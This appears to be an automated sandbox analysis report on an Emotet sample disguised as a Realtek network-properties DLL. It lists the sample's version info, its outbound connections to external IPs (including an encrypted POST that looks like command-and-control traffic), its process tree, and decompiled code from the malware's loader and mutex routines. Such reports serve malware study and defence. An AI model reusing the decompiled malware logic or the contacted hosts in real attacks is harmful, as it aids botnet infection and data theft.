CRYPT32.dll	CryptSIPAddProvider
KERNEL32.dll	CancelIo, FlsGetValue, DuplicateHandle, FlsFree, LockFile, GlobalDeleteAtom, GetBinaryTypeA

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2013 Realtek Semiconductor Corporation. All Right Reserved.
InternalName	RTNicProp
FileVersion	1, 2, 0, 6
CompanyName	Realtek Semiconductor Corporation
ProductName	RTNicProp
ProductVersion	1, 2, 0, 6
FileDescription	About Page
OriginalFilename	RTNicProp.dll
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Bulgarian	Bulgaria
Chinese	Taiwan
Czech	Czech Republic
Danish	Denmark
Greek	Greece
English	United States
Finnish	Finland
Hebrew	Israel
Hungarian	Hungary
Japanese	Japan
Korean	North Korea
Korean	South Korea
Polish	Poland
Romanian	Romania
Russian	Russia
Croatian	Croatia
Slovak	Slovakia
Thai	Thailand
Turkish	Turkey
Slovenian	Slovenia
Vietnamese	Vietnam
Chinese	China
Portuguese	Portugal

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2021 15:42:35.453574896 CEST	49743	80	192.168.2.6	184.186.78.177
Oct 5, 2021 15:42:38.465169907 CEST	49743	80	192.168.2.6	184.186.78.177
Oct 5, 2021 15:42:44.558249950 CEST	49743	80	192.168.2.6	184.186.78.177
Oct 5, 2021 15:42:59.008382082 CEST	49748	80	192.168.2.6	110.143.116.201
Oct 5, 2021 15:43:02.009625912 CEST	49748	80	192.168.2.6	110.143.116.201
Oct 5, 2021 15:43:08.010224104 CEST	49748	80	192.168.2.6	110.143.116.201
Oct 5, 2021 15:43:28.164427042 CEST	49840	50000	192.168.2.6	66.220.110.56
Oct 5, 2021 15:43:31.168375969 CEST	49840	50000	192.168.2.6	66.220.110.56
Oct 5, 2021 15:43:37.168931961 CEST	49840	50000	192.168.2.6	66.220.110.56
Oct 5, 2021 15:43:50.287256002 CEST	49848	8080	192.168.2.6	197.82.220.82
Oct 5, 2021 15:43:53.296036005 CEST	49848	8080	192.168.2.6	197.82.220.82
Oct 5, 2021 15:43:59.312094927 CEST	49848	8080	192.168.2.6	197.82.220.82
Oct 5, 2021 15:44:16.475255013 CEST	49849	443	192.168.2.6	77.157.40.119
Oct 5, 2021 15:44:16.475307941 CEST	443	49849	77.157.40.119	192.168.2.6
Oct 5, 2021 15:44:16.475476027 CEST	49849	443	192.168.2.6	77.157.40.119
Oct 5, 2021 15:44:16.475884914 CEST	49849	443	192.168.2.6	77.157.40.119
Oct 5, 2021 15:44:16.475908995 CEST	443	49849	77.157.40.119	192.168.2.6
Oct 5, 2021 15:44:16.475951910 CEST	443	49849	77.157.40.119	192.168.2.6
Oct 5, 2021 15:44:17.835827112 CEST	49850	80	192.168.2.6	24.217.117.217
Oct 5, 2021 15:44:20.845112085 CEST	49850	80	192.168.2.6	24.217.117.217
Oct 5, 2021 15:44:26.861336946 CEST	49850	80	192.168.2.6	24.217.117.217
Oct 5, 2021 15:44:44.584259033 CEST	49851	8080	192.168.2.6	212.83.128.139
Oct 5, 2021 15:44:47.581681013 CEST	49851	8080	192.168.2.6	212.83.128.139
Oct 5, 2021 15:44:53.582298994 CEST	49851	8080	192.168.2.6	212.83.128.139
Oct 5, 2021 15:45:11.096234083 CEST	49852	8080	192.168.2.6	139.162.216.32
Oct 5, 2021 15:45:11.122999907 CEST	8080	49852	139.162.216.32	192.168.2.6
Oct 5, 2021 15:45:11.630743980 CEST	49852	8080	192.168.2.6	139.162.216.32
Oct 5, 2021 15:45:11.657370090 CEST	8080	49852	139.162.216.32	192.168.2.6
Oct 5, 2021 15:45:12.161928892 CEST	49852	8080	192.168.2.6	139.162.216.32
Oct 5, 2021 15:45:12.188426971 CEST	8080	49852	139.162.216.32	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 5, 2021 15:44:44.613228083 CEST	212.83.128.139	192.168.2.6	14b1	(Port unreachable)	Destination Unreachable
Oct 5, 2021 15:44:47.611484051 CEST	212.83.128.139	192.168.2.6	14b1	(Port unreachable)	Destination Unreachable
Oct 5, 2021 15:44:53.612890005 CEST	212.83.128.139	192.168.2.6	14b1	(Port unreachable)	Destination Unreachable

HTTP Request Dependency Graph

77.157.40.119:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49849	77.157.40.119	443	C:\Windows\SysWOW64\sharedconnect.exe

Timestamp	kBytes transferred	Direction	Data
Oct 5, 2021 15:44:16.475884914 CEST	6905	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 77.157.40.119:443 Content-Length: 388 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8 Data Ascii: .0 c\xPV[^iYlFY816A\|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-vXn[5yFO&?W9?Ya#JX-"wCHOBa$VLVpDev%Rn3`cz{oPD0:s\DD5\|@N[*a'IoUbn-

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: tcpmdmaus.exe PID: 5368 Parent PID: 6096

General

Start time:	15:42:06
Start date:	05/10/2021
Path:	C:\Users\user\Desktop\tcpmdmaus.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\tcpmdmaus.exe'
Imagebase:	0x3b0000
File size:	280576 bytes
MD5 hash:	ABE13DDC14525C4C35A85224689BFB27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6160 Parent PID: 560

General

Start time:	15:42:18
Start date:	05/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tcpmdmaus.exe PID: 3200 Parent PID: 5368

General

Start time:	15:42:18
Start date:	05/10/2021
Path:	C:\Users\user\Desktop\tcpmdmaus.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\tcpmdmaus.exe
Imagebase:	0x3b0000
File size:	280576 bytes
MD5 hash:	ABE13DDC14525C4C35A85224689BFB27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Analysis Process: sharedconnect.exe PID: 2932 Parent PID: 560

General

Start time:	15:42:20
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\sharedconnect.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\sharedconnect.exe
Imagebase:	0x3b0000
File size:	280576 bytes
MD5 hash:	ABE13DDC14525C4C35A85224689BFB27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Analysis Process: sharedconnect.exe PID: 6128 Parent PID: 2932

General

Start time:	15:42:32
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\sharedconnect.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\sharedconnect.exe
Imagebase:	0x3b0000
File size:	280576 bytes
MD5 hash:	ABE13DDC14525C4C35A85224689BFB27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2940 Parent PID: 560

General

Start time:	15:42:35
Start date:	05/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2440 Parent PID: 560

General

Start time:	15:42:47
Start date:	05/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5752 Parent PID: 560

General

Start time:	15:42:56
Start date:	05/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4368 Parent PID: 560

General

Start time:	15:43:26
Start date:	05/10/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: tcpmdmaus.exe PID: 5368 Parent PID: 6096 tcpmdmaus.exeCOMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	10.7%
Total number of Nodes:	411
Total number of Limit Nodes:	17

Executed Functions

Function 003B14C9, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 259
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E003B14C9() {
				void* _v16;
				void* _v36;
				CHAR* _v40;
				signed int _v44;
				short _v46;
				intOrPtr _v48;
				intOrPtr _v52;
				long _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v74;
				signed int _v76;
				signed int _v80;
				void* _v84;
				char* _v88;
				void** _v96;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v332;
				void* _v344;
				intOrPtr _v348;
				struct _ICONINFO _v368;
				char _v610;
				intOrPtr _v616;
				intOrPtr _v644;
				void* _v652;
				char _v656;
				intOrPtr _v660;
				intOrPtr _v688;
				char _v692;
				void* _v696;
				intOrPtr _v700;
				char* _v704;
				intOrPtr* _v708;
				signed int _v712;
				intOrPtr _v716;
				void* _v720;
				CHAR* _v724;
				signed int _v728;
				intOrPtr _v732;
				signed int _v736;
				intOrPtr _v740;
				signed int _v744;
				long _v748;
				intOrPtr _v752;
				int _v756;
				int _v760;
				struct _ICONINFO* _v764;
				struct HICON__* _v768;
				long _v785;
				intOrPtr _v792;
				signed int _v793;
				short _v794;
				intOrPtr _v796;
				void* _v808;
				signed int _v812;
				intOrPtr _v820;
				signed int _v824;
				void* _v828;
				intOrPtr _v832;
				long _v833;
				long _v834;
				intOrPtr _v836;
				int _v844;
				intOrPtr _v864;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _t144;
				int _t145;
				int _t146;
				intOrPtr _t147;
				int _t148;
				struct HICON__* _t150;
				void* _t151;
				struct HICON__* _t156;
				void* _t161;
				intOrPtr _t163;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t172;
				intOrPtr _t173;
				void* _t176;
				signed int _t177;
				intOrPtr _t183;
				CHAR* _t186;
				long _t188;
				signed int _t189;
				signed int _t190;
				CHAR* _t192;
				intOrPtr _t202;
				void* _t204;
				void* _t227;
				signed int _t240;
				signed int _t252;
				void* _t255;

				_v36 = 0;
				_v40 = 0x440555f2;
				_v46 = 0xb400;
				_v52 = 0x76126aff;
				_t192 = _v40;
				_t240 = _v44;
				asm("sbb edi, edx");
				_v700 = 0x761272f5;
				_v44 = _t240 + 0x14c58f1d;
				_v60 = 0;
				_v64 = 0x8e773d56 - _t192;
				_v616 = 0x237b1133;
				_v696 = 0;
				_t186 =  &_v332;
				_v704 =  &_v610;
				_v708 = wsprintfA;
				_v712 = _t240;
				_v716 = _t192;
				_v720 = _v36;
				_v724 = _t186;
				_v728 =  &_v696;
				_t144 =  *_v708(_t186, "%S", _v704);
				_t255 = (_t252 & 0xfffffff8) - 0x348 + 0xc;
				_v732 = _t144;
				_t145 = GetBinaryTypeA(_v724, _v728); // executed
				_v44 =  !_v712;
				_v736 = _t145;
				_t146 = ReleaseCapture();
				_v740 = _t146;
				_t147 =  *__imp__GetGUIThreadInfo(0x5fa,  &_v692);
				_v84 = 0;
				_v752 = _t147;
				_t148 = DuplicateHandle(0, 0, 0,  &_v84, _v60 + 0x89ed98db, 0x736, _v60 + 0x89ed98db); // executed
				_v36 = _v728;
				_v40 = _v724;
				_t188 = _v708 - _v60;
				_v756 = _t148;
				_v760 = LockFile(0, _t188, _t188, _v60 ^ 0x76126cc0, 0x1ac);
				_v764 =  &(_v368.xHotspot);
				_t150 = CreateIconIndirect( &(_v368.xHotspot));
				_v652 = 0;
				_v768 = _t150;
				goto L17;
				do {
					while(1) {
						L17:
						_t151 = _v652;
						_v344 = _t151;
						_t202 = _t151 - 1;
						_v828 = _t151;
						_v832 = _t202;
						if(_t202 == 0) {
							goto L21;
						}
						_t183 = _v828 - 5;
						_v836 = _t183;
						if(_t183 == 0) {
							L1:
							_v794 = GlobalDeleteAtom(0x3a);
						} else {
						}
						L16:
						_v824 = _v348 + 1;
						_t156 = CreateIconIndirect( &_v368);
						_t204 = _v828;
						_v660 = _t204;
						_v44 = _v736;
						_v48 = _v732;
						_v60 = _v728 ^ 0x4ebe5432;
						_v832 = _t156;
						if(_t204 > 0x73) {
							_v88 =  &_v656;
							_v60 = _v728 + _v728;
							_t189 = _t188 & 0xffffff00 | __eflags > 0x00000000;
							__eflags = _v76;
							_t75 = _v76 != 0;
							__eflags = _t75;
							_t188 = _t189 & 0xffffff00 | _t75;
							_v785 = _t188;
							_v792 = _v80 - 0x287c73b9;
							_v793 = _t188;
							if(_t75 != 0) {
								_v793 = _v785;
							}
							__eflags = _v793;
							if(__eflags != 0) {
								_t161 = _v80;
								_t255 = _t255 - 0xc;
								_t227 = _t255;
								 *((intOrPtr*)(_t227 + 8)) =  &_v656;
								 *(_t227 + 4) = "Card4G";
								_v808 = _t161;
								_v812 = _v76;
								L003C784C(); // executed
								_t190 = _t188 & 0xffffff00 | __eflags > 0x00000000;
								__eflags = _v824;
								_t97 = _v824 != 0;
								__eflags = _t97;
								_t188 = _t190 & 0xffffff00 | _t97;
								_v828 = _t161;
								_v832 = _v820 - 0x792c87a;
								_v833 = _t188;
								_v834 = _t188;
								if(_t97 != 0) {
									_v834 = _v833;
								}
								__eflags = _v834;
								if(__eflags != 0) {
									_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t163 + 0xa4)) - 6;
									if( *((intOrPtr*)(_t163 + 0xa4)) < 6) {
										break;
									} else {
										_v796 = 0;
										_t172 = L003B1050();
										_t173 =  *((intOrPtr*)(_t172 + 0x3c));
										_t188 = _v748;
										_v56 = _t188;
										_v60 = _v744;
										__eflags =  *((intOrPtr*)(_t172 + _t173)) - (_v80 ^ 0x76122faf);
										_t176 =  ==  ? _t172 + _t173 : _v796;
										__eflags =  *((intOrPtr*)(_t176 + 0x48)) - (_v74 ^ 0x0000b405);
										if( *((intOrPtr*)(_t176 + 0x48)) > (_v74 ^ 0x0000b405)) {
											_t177 = L003B109B(); // executed
											_v812 = _t177;
										} else {
											break;
										}
									}
								} else {
									goto L1;
								}
							} else {
								break;
							}
							L24:
							_v896 = _v116;
							return 1;
						} else {
							continue;
						}
						L21:
						_v844 = CancelIo(0);
						goto L16;
					}
					_v96 =  &_v652;
					_v864 = _v644;
					_t166 =  *__imp__AddUsersToEncryptedFile(L"Swb4Ci$@pjWqJ",  &_v652);
					_v876 = _t166;
					_t167 =  *__imp__FlsGetValue(1);
					_v884 = _t167;
					_t168 =  *__imp__FlsFree(0x14a6f8);
					_v688 = 0x2e4de8af;
					__eflags = _v880 - 0x56f45d1e;
					_v892 = _t168;
				} while (__eflags >= 0);
				_v832 = _v112;
				goto L24;
			}

0x003b14dd
0x003b14e8
0x003b14f3
0x003b14fd
0x003b1508
0x003b1516
0x003b1526
0x003b1528
0x003b1536
0x003b153d
0x003b1544
0x003b154b
0x003b1564
0x003b156f
0x003b1576
0x003b1582
0x003b159e
0x003b15a5
0x003b15ac
0x003b15b3
0x003b15ba
0x003b15c1
0x003b15c3
0x003b15dc
0x003b15e3
0x003b15ee
0x003b15fb
0x003b15ff
0x003b1614
0x003b1618
0x003b1621
0x003b164d
0x003b1654
0x003b165d
0x003b166b
0x003b168d
0x003b169f
0x003b16bd
0x003b16c1
0x003b16c5
0x003b16c7
0x003b16d2
0x003b16d6
0x003b18bc
0x003b18bc
0x003b18bc
0x003b18bc
0x003b18c3
0x003b18cc
0x003b18cf
0x003b18d3
0x003b18d7
0x00000000
0x00000000
0x003b18df
0x003b18e2
0x003b18e6
0x003b16db
0x003b16e4
0x00000000
0x003b18ec
0x003b1858
0x003b186e
0x003b1872
0x003b1874
0x003b1878
0x003b1886
0x003b1894
0x003b18a8
0x003b18b2
0x003b18b6
0x003b1773
0x003b1791
0x003b179d
0x003b17a0
0x003b17a2
0x003b17a2
0x003b17a2
0x003b17a5
0x003b17a9
0x003b17ad
0x003b17b1
0x003b17b7
0x003b17b7
0x003b17bf
0x003b17c1
0x003b17e6
0x003b17f4
0x003b17f7
0x003b1800
0x003b1803
0x003b180a
0x003b180e
0x003b1812
0x003b1821
0x003b1828
0x003b182a
0x003b182a
0x003b182a
0x003b182d
0x003b1831
0x003b1835
0x003b1839
0x003b183d
0x003b1843
0x003b1843
0x003b184b
0x003b184d
0x003b175a
0x003b175d
0x003b1764
0x00000000
0x003b176a
0x003b16f0
0x003b16f4
0x003b170a
0x003b171d
0x003b171f
0x003b1726
0x003b1732
0x003b1738
0x003b1748
0x003b174c
0x003b17c8
0x003b17cd
0x003b174e
0x00000000
0x003b174e
0x003b174c
0x003b1853
0x00000000
0x003b1853
0x003b17c3
0x00000000
0x003b17c3
0x003b1974
0x003b1980
0x003b198b
0x00000000
0x00000000
0x00000000
0x003b18f1
0x003b18fa
0x00000000
0x003b18fa
0x003b1911
0x003b192b
0x003b192f
0x003b1939
0x003b193d
0x003b194a
0x003b194e
0x003b1950
0x003b195f
0x003b1965
0x003b1965
0x003b17dd
0x00000000

APIs

GetBinaryTypeA.KERNEL32(?,?), ref: 003B15E3
DuplicateHandle.KERNELBASE(00000000,00000000,00000000,?,?,00000736,?), ref: 003B1654
LockFile.KERNEL32(00000000,?,?,?,000001AC), ref: 003B16A6
CreateIconIndirect.USER32 ref: 003B16C5

Strings

Swb4Ci$@pjWqJ, xrefs: 003B1926

Memory Dump Source

Source File: 00000000.00000002.371804412.00000000003B1000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.371799332.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371810723.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371822996.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371838158.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371845494.00000000003C3000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.371860441.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371865348.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.371871752.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371878013.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371896008.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371908483.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.371918760.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.371927643.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_tcpmdmaus.jbxd

Similarity

API ID: BinaryCreateDuplicateFileHandleIconIndirectLockType
String ID: Swb4Ci$@pjWqJ
API String ID: 3494283109-4206937320
Opcode ID: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction ID: 3f6a16f0f9272ec27de765e3af809d54d91353e383327e36e7414797e0fa7b63
Opcode Fuzzy Hash: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction Fuzzy Hash: 7BC1F375A183808FC336CF69C490B9BBBE9BFC8304F54891EE58D97750DA70AA05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 009518C0, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E009518C0(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x009518ca
0x009518d0

APIs

GetProcessHeap.KERNEL32(00000000,?,009510E3), ref: 009518C3
RtlFreeHeap.NTDLL(00000000), ref: 009518CA

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 603ba641b0a340fe2b1d3e88fdcb1ce089a55bdcc04fae7f4ef023e736c58601
Instruction ID: 57a2e958679d229add92b02c9c675c7254e6e7feae11f15aeccf772ca22a34f3
Opcode Fuzzy Hash: 603ba641b0a340fe2b1d3e88fdcb1ce089a55bdcc04fae7f4ef023e736c58601
Instruction Fuzzy Hash: CCA00271D687005FED4457B1AD1DB153578D74C703F004644B115C5150956554009726

Uniqueness

Uniqueness Score: -1.00%

Function 00951B40, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00951B44

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 54cf0ffd7074867c4bbb68b65a52cbc3bde928a2d9d60e1e25ef99e3104f3e7c
Instruction ID: 9a96638fd6c80bfc3dc4db9bf7f091e90e8e715762b66d44a1d9314b6241127b
Opcode Fuzzy Hash: 54cf0ffd7074867c4bbb68b65a52cbc3bde928a2d9d60e1e25ef99e3104f3e7c
Instruction Fuzzy Hash: FCB0923290A620878328623A288833859840A4A27631A17329CBBD36E0B6348CC78A4A

Uniqueness

Uniqueness Score: -1.00%

Function 0095110C, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 46
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00951113
_snwprintf.NTDLL ref: 00951167
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0095117A
GetLastError.KERNEL32 ref: 00951186
CloseHandle.KERNEL32(00000000), ref: 009511DA

Strings

P, xrefs: 0095113D
X, xrefs: 00951134
X, xrefs: 0095114B
P, xrefs: 0095111B
M, xrefs: 0095112D
E, xrefs: 00951144

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID: E$M$P$P$X$X
API String ID: 670123879-2257793354
Opcode ID: becf092a1752f0b99d5613fb6dd8828f6de39a1680444b856613b99bc8f24800
Instruction ID: 48e4eb0f023d6da0765688edaba3f29a728378da05c6194f1bc22d9d30295312
Opcode Fuzzy Hash: becf092a1752f0b99d5613fb6dd8828f6de39a1680444b856613b99bc8f24800
Instruction Fuzzy Hash: 84116171D143199BCB10CFD6DC887AEBBB8FF48307F004156E905A2240C7B84A488F96

Uniqueness

Uniqueness Score: -1.00%

Function 00951258, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00951258(void* __esi) {
				void* _t7;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t19 = __esi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x30);
				_push(0x80);
				_t7 = L00951E60(__esi); // executed
				if(_t7 != 0) {
					WaitForSingleObject(_t17, 0xffffffff);
					CloseHandle( *(_t21 - 0x30));
					CloseHandle( *(_t21 - 0x2c));
				}
				CloseHandle(_t17);
				CloseHandle(_t14);
				return _t19;
			}

0x00951258
0x00951258
0x00951261
0x00951262
0x0095126d
0x00951277
0x0095127c
0x00951285
0x0095128e
0x0095128e
0x00951295
0x0095129c
0x009512aa

APIs

GetModuleFileNameW.KERNEL32 ref: 00951258
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095127C
CloseHandle.KERNEL32(?,?,000000FF), ref: 00951285
CloseHandle.KERNEL32(?,?,000000FF), ref: 0095128E
